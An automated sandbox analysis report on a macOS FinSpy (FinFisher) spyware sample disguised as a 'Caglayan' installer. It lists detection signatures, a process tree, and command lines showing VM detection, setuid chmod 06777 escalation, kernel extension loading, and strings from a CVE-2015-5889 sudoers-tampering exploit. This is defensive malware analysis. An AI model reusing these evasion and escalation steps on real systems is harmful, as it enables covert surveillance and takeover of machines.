Play interactive tour

Edit tour

Analysis Report finfisher.dmg

Overview

General Information

Sample Name:	finfisher.dmg
Analysis ID:	113412
MD5:	e734730dcad82a6bd050b0d3b89b44e3
SHA1:	e1df29dcb571fd3296ed4a5d2689178acee355b5
SHA256:	4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea
Most interesting Screenshot:

Detection

FinSpy

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Detected macOS FinSpy (FinFisher) trojan

Malicious sample detected (through community Yara rule)

Yara detected FinSpy

App bundle contains hidden files/directories

Attaches disk images with shell command 'hdiutil'

Creates kernel extensions

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Executes hidden files

Opens applications from non-standard application directories

Queries the Manufacturer of the machine (might be used for detecting VM presence)

Sets full permissions to files and/or directories

Writes DER encoded certificate files to disk without the typical file extension

Writes Mach-O files to untypical directories

Changes permissions of written Mach-O files

Contains symbols with paths

Contains symbols with suspicious names likely related to encryption

Contains symbols with suspicious names likely related to networking

Creates and/or modifies files and/or directories in common kernel extension directories

Creates application bundles

Creates hidden files, links and/or directories

Creates memory-persistent launch services

Creates user-wide 'launchd' managed services aka launch agents

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "chown" command used to modify ownership and group ownership

Executes the "grep" command used to find patterns in files or piped streams

Executes the "ps" command used to list the status of processes

Executes the "rm" command used to delete files or directories

Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Executes the "system_profiler" command used to collect detailed system hardware and software information

Explicitly loads kernel extensions

Explicitly loads/starts launch services

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Opens applications that might be created ones

Reads hardware related sysctl values

Reads launchservices plist files

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Reads the systems OS release and/or type

Reads the systems hostname

Reads user launchservices plist file containing default apps for corresponding file types

Sample or dropped file has a small TEXT segment size indicating that the actual code is not in this segment hampering debugging

Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)

Uses Security framework containing interfaces for system-level user authentication and authorization

Writes 32-bit Mach-O files to disk

Writes 64-bit Mach-O files to disk

Writes Python scripts without typical Python file extensions

Writes ZIP files to disk

Writes certificate files to disk

Yara signature match

Classification

Startup

system is mac-mojave

xpcproxy New Fork (PID: 772, Parent: 1)

Install Caglayan (MD5: 083628f5eaf3d1d5018d45dd10391d9f) Arguments: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan

bash New Fork (PID: 773, Parent: 772)

bash New Fork (PID: 774, Parent: 773)

bash New Fork (PID: 775, Parent: 774)

dirname (MD5: 6c2a99249cf9eefc79be8dc17bcc5758) Arguments: dirname /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan

bash New Fork (PID: 776, Parent: 772)

open (MD5: 429e364174ecacaa7bd753b1d15a998e) Arguments: open .log/ARA0848.app

bash New Fork (PID: 782, Parent: 772)

sleep (MD5: 819cf284f59840e52b6b17f4ed2512e8) Arguments: sleep 2

bash New Fork (PID: 786, Parent: 772)

rm (MD5: 269d0bd0553e7eafb6e3f70026eeda2b) Arguments: rm Install alayan

bash New Fork (PID: 787, Parent: 772)

mv (MD5: 71b4f7c9a383f7c62c738273039ba658) Arguments: mv installer Install alayan

bash New Fork (PID: 788, Parent: 772)

rm (MD5: 269d0bd0553e7eafb6e3f70026eeda2b) Arguments: rm -rf .log

bash New Fork (PID: 789, Parent: 772)

Install alayan (MD5: 177b332846b488a28d2468f0fed6309d) Arguments: ./Install alayan

installer New Fork (PID: 794, Parent: 789)

hdiutil New Fork (PID: 795, Parent: 794)

diskimages-helper New Fork (PID: 796, Parent: 795)

diskimages-helper New Fork (PID: 797, Parent: 796)

Adobe AIR Installer New Fork (PID: 816, Parent: 794)

Adobe AIR Application Installer New Fork (PID: 817, Parent: 816)

xpcproxy New Fork (PID: 777, Parent: 1)

installer (MD5: 405bb24ade435693b11af1d81e2bb279) Arguments: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer

sh New Fork (PID: 778, Parent: 777)

sh New Fork (PID: 779, Parent: 778)

system_profiler (MD5: de1aa7b1e123ef5ba1b076a085bbcece) Arguments: system_profiler SPUSBDataType

system_profiler New Fork (PID: 781, Parent: 779)

sh New Fork (PID: 780, Parent: 778)

egrep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: egrep -i Manufacturer: (parallels|vmware|virtualbox)

helper New Fork (PID: 783, Parent: 777)

helper New Fork (PID: 792, Parent: 783)

security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /usr/sbin/chown auth 3 root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer

chown (MD5: 4412bd1c28443ef4cc603af3ad92ddc0) Arguments: /usr/sbin/chown root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer

helper New Fork (PID: 793, Parent: 783)

security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /bin/chmod auth 3 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer

chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: /bin/chmod 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer

installer New Fork (PID: 798, Parent: 777)

launchctl New Fork (PID: 800, Parent: 798)

xpcproxy New Fork (PID: 801, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 802, Parent: 801)

sh New Fork (PID: 803, Parent: 802)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 804, Parent: 802)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 819, Parent: 801)

kextstat New Fork (PID: 822, Parent: 801)

kextload New Fork (PID: 823, Parent: 801)

xpcproxy New Fork (PID: 827, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 828, Parent: 827)

sh New Fork (PID: 829, Parent: 828)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 830, Parent: 828)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 831, Parent: 827)

kextstat New Fork (PID: 833, Parent: 827)

kextload New Fork (PID: 834, Parent: 827)

xpcproxy New Fork (PID: 835, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 836, Parent: 835)

sh New Fork (PID: 837, Parent: 836)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 838, Parent: 836)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 839, Parent: 835)

kextstat New Fork (PID: 840, Parent: 835)

kextload New Fork (PID: 841, Parent: 835)

xpcproxy New Fork (PID: 842, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 843, Parent: 842)

sh New Fork (PID: 844, Parent: 843)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 845, Parent: 843)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 846, Parent: 842)

kextstat New Fork (PID: 847, Parent: 842)

kextload New Fork (PID: 848, Parent: 842)

xpcproxy New Fork (PID: 849, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 850, Parent: 849)

sh New Fork (PID: 851, Parent: 850)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 852, Parent: 850)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 853, Parent: 849)

kextstat New Fork (PID: 854, Parent: 849)

kextload New Fork (PID: 855, Parent: 849)

xpcproxy New Fork (PID: 856, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 857, Parent: 856)

sh New Fork (PID: 858, Parent: 857)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 859, Parent: 857)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 860, Parent: 856)

kextstat New Fork (PID: 861, Parent: 856)

kextload New Fork (PID: 862, Parent: 856)

xpcproxy New Fork (PID: 863, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 864, Parent: 863)

sh New Fork (PID: 865, Parent: 864)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 866, Parent: 864)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 867, Parent: 863)

kextstat New Fork (PID: 868, Parent: 863)

kextload New Fork (PID: 869, Parent: 863)

xpcproxy New Fork (PID: 870, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 871, Parent: 870)

sh New Fork (PID: 872, Parent: 871)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 873, Parent: 871)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 875, Parent: 870)

kextstat New Fork (PID: 876, Parent: 870)

kextload New Fork (PID: 877, Parent: 870)

xpcproxy New Fork (PID: 878, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 879, Parent: 878)

sh New Fork (PID: 880, Parent: 879)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 881, Parent: 879)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 882, Parent: 878)

kextstat New Fork (PID: 883, Parent: 878)

kextload New Fork (PID: 884, Parent: 878)

xpcproxy New Fork (PID: 885, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 886, Parent: 885)

sh New Fork (PID: 887, Parent: 886)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 888, Parent: 886)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 889, Parent: 885)

kextstat New Fork (PID: 890, Parent: 885)

kextload New Fork (PID: 891, Parent: 885)

xpcproxy New Fork (PID: 892, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 893, Parent: 892)

sh New Fork (PID: 894, Parent: 893)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 895, Parent: 893)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 896, Parent: 892)

kextstat New Fork (PID: 897, Parent: 892)

kextload New Fork (PID: 898, Parent: 892)

xpcproxy New Fork (PID: 899, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 900, Parent: 899)

sh New Fork (PID: 901, Parent: 900)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 902, Parent: 900)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 903, Parent: 899)

kextstat New Fork (PID: 904, Parent: 899)

kextload New Fork (PID: 905, Parent: 899)

xpcproxy New Fork (PID: 906, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 907, Parent: 906)

sh New Fork (PID: 908, Parent: 907)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 909, Parent: 907)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 910, Parent: 906)

kextstat New Fork (PID: 911, Parent: 906)

kextload New Fork (PID: 912, Parent: 906)

xpcproxy New Fork (PID: 913, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 914, Parent: 913)

sh New Fork (PID: 915, Parent: 914)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 916, Parent: 914)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 917, Parent: 913)

kextstat New Fork (PID: 918, Parent: 913)

kextload New Fork (PID: 919, Parent: 913)

xpcproxy New Fork (PID: 920, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 921, Parent: 920)

sh New Fork (PID: 922, Parent: 921)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 923, Parent: 921)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 924, Parent: 920)

kextstat New Fork (PID: 925, Parent: 920)

kextload New Fork (PID: 926, Parent: 920)

xpcproxy New Fork (PID: 927, Parent: 1)

logind (MD5: 6bfeb5419fb74f46fbbdba90f1b817fd) Arguments: /private/etc/logind

sh New Fork (PID: 928, Parent: 927)

sh New Fork (PID: 929, Parent: 928)

ps (MD5: 12e96c3ace6dcbbe7e84712ef5fb23cd) Arguments: ps -ef

sh New Fork (PID: 930, Parent: 928)

grep (MD5: e1a87983928499c3350fe1775def5d49) Arguments: grep logind

logind New Fork (PID: 931, Parent: 927)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
finfisher.dmg	JoeSecurity_FinSpy_2	Yara detected FinSpy	Joe Security
installer	JoeSecurity_FinSpy_2	Yara detected FinSpy	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/Users/ben/Library/Caches/org.logind.ctp.archive/helper2	hacktool_macos_exploit_cve_5889	http://www.cvedetails.com/cve/cve-2015-5889	@mimeframe	0xcc:$a1: /etc/sudoers 0x18a:$a1: /etc/sudoers 0x2cc:$a1: /etc/sudoers 0x305:$a1: /etc/sudoers 0xfc:$a2: /etc/crontab 0x1bf:$a2: /etc/crontab 0x263:$a2: /etc/crontab 0x155:$a3: * * * * * root echo 0x16a:$a4: ALL ALL=(ALL) NOPASSWD: ALL 0x211:$a5: /usr/bin/rsh 0x227:$a6: localhost
/Users/ben/Library/Caches/org.logind.ctp.archive/installer	JoeSecurity_FinSpy_2	Yara detected FinSpy	Joe Security

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Cryptography:

Writes DER encoded certificate files to disk without the typical file extension

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer.p7	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/prodSvce.crl	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/cds.crl	Jump to dropped file

Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _CRYPTO_free
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _ERR_load_crypto_strings
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: _crypthead.calls

Source: finfisher.dmg	String found in binary or memory: http://crl.apple.com/root.crl0
Source: finfisher.dmg	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: finfisher.dmg	String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: finfisher.dmg	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: finfisher.dmg	String found in binary or memory: http://www.apple.com/appleca0
Source: finfisher.dmg	String found in binary or memory: http://www.bluedomepress.com
Source: finfisher.dmg	String found in binary or memory: http://www.bluedomepress.com/about/privacypolicy
Source: finfisher.dmg	String found in binary or memory: http://www.bluedomepress.com/about/termsofuse
Source: finfisher.dmg	String found in binary or memory: http://www.winimage.com/zLibDll
Source: finfisher.dmg	String found in binary or memory: https://www.apple.com/appleca/0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2, type: DROPPED

Matched rule: http://www.cvedetails.com/cve/cve-2015-5889 Author: @mimeframe

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

Python file created: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2

Jump to dropped file

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2, type: DROPPED

Matched rule: hacktool_macos_exploit_cve_5889 author = @mimeframe, description = http://www.cvedetails.com/cve/cve-2015-5889, reference = https://www.exploit-db.com/exploits/38371/

Source: classification engine

Classification label: mal100.troj.evad.macDMG@0/49@0/0

Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/NAIB.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/ParamChecker.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/SignatureVerification.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/main.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(InstallLogMsgs.o)
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(LibInstall.o)
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/Bootstrapper.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/Downloader.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/ErrorDialogController.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/AIR.build/Release/NativeAppInstallBootstrapper.build/Objects-normal/x86_64/LocalizedStrings.o
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/src/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/src/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/src/LibInstall.h
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/Runtime/Core/include/runtime/mac/embeddedmessages.h
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/generic/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(MacInstall.o)
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/../../build/mac/int/Release/libinstall.a(SharedMacUtils.o)
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/../../../../shared/platform/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/../../../../shared/platform/mac/SharedMacUtils.h
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/LibInstall/platform/OSX/Mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: /Volumes/Builds/jenkins/ws/St_Make/code/products/AIR/SDK/NativeAppInstallBootstrapper/mac/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: /SourceCache/arclite/arclite-34/source/
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: /Users/dev/DevStuff/obfuscator/build/lib/arc/libarclite_macosx.a(arclite.o)
Source: dropped file installer.311.dr	Mach-O symbol: /jenkins/ws/St_Make/code/build/mac/int/AIR.build/Release/SelfExtractor.build/Objects-normal/x86_64/SelfExtractor-E79CFC41C1857C8E.o
Source: dropped file installer.311.dr	Mach-O symbol: /jenkins/ws/St_Make/code/products/AIR/Runtime/SelfExtractor/
Source: dropped file helper.290.dr	Mach-O symbol: /Users/dev/DevStuff/obfuscator/build/lib/arc/libarclite_macosx.a(arclite.o)
Source: dropped file helper.290.dr	Mach-O symbol: /SourceCache/arclite/arclite-34/source/

Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _OBJC_IVAR_$_Downloader.bytesReceived
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _OBJC_IVAR_$_Downloader.bytesReceived
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSend
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSendSuper2
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSend_fixup
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSend_stret
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _NSSearchPathForDirectoriesInDomains
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/installer	Mach-O symbol: _NSURLErrorDomain
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: _NSSearchPathForDirectoriesInDomains
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSend
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSendSuper2
Source: extracted file from submission caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer	Mach-O symbol: _objc_msgSend_fixup
Source: dropped file installer.311.dr	Mach-O symbol: _objc_msgSend
Source: dropped file helper.290.dr	Mach-O symbol: _objc_msgSend
Source: dropped file helper.290.dr	Mach-O symbol: _objc_msgSend_fixup
Source: dropped file helper3.290.dr	Mach-O symbol: _mach_port_insert_right
Source: dropped file helper3.290.dr	Mach-O symbol: _mach_port_allocate
Source: dropped file helper3.290.dr	Mach-O symbol: _kIOMasterPortDefault
Source: dropped file helper3.290.dr	Mach-O symbol: _objc_msgSend
Source: dropped file helper3.290.dr	Mach-O symbol: _IOConnectCallScalarMethod
Source: dropped file helper3.290.dr	Mach-O symbol: _IOConnectRelease

Source: initial sample

Mach-O header: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Attaches disk images with shell command 'hdiutil'

Show sources

Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer (PID: 794)

Hdiutil command executed: /usr/bin/hdiutil attach /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/AIRInstaller.dmg -mountpoint /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint

Jump to behavior

Executes hidden files

Show sources

Source: /usr/libexec/xpcproxy (PID: 777)

File in hidden directory executed: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer

Jump to behavior

Opens applications from non-standard application directories

Show sources

Source: /bin/bash (PID: 776)

Application opened: open .log/ARA0848.app

Jump to behavior

Sets full permissions to files and/or directories

Show sources

Source: /usr/libexec/security_authtrampoline (PID: 793)

Chmod executable with 777: /bin/chmod -> /bin/chmod 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer

Jump to behavior

Writes DER encoded certificate files to disk without the typical file extension

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer.p7	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/prodSvce.crl	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	DER file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/cds.crl	Jump to dropped file

Writes Mach-O files to untypical directories

Show sources

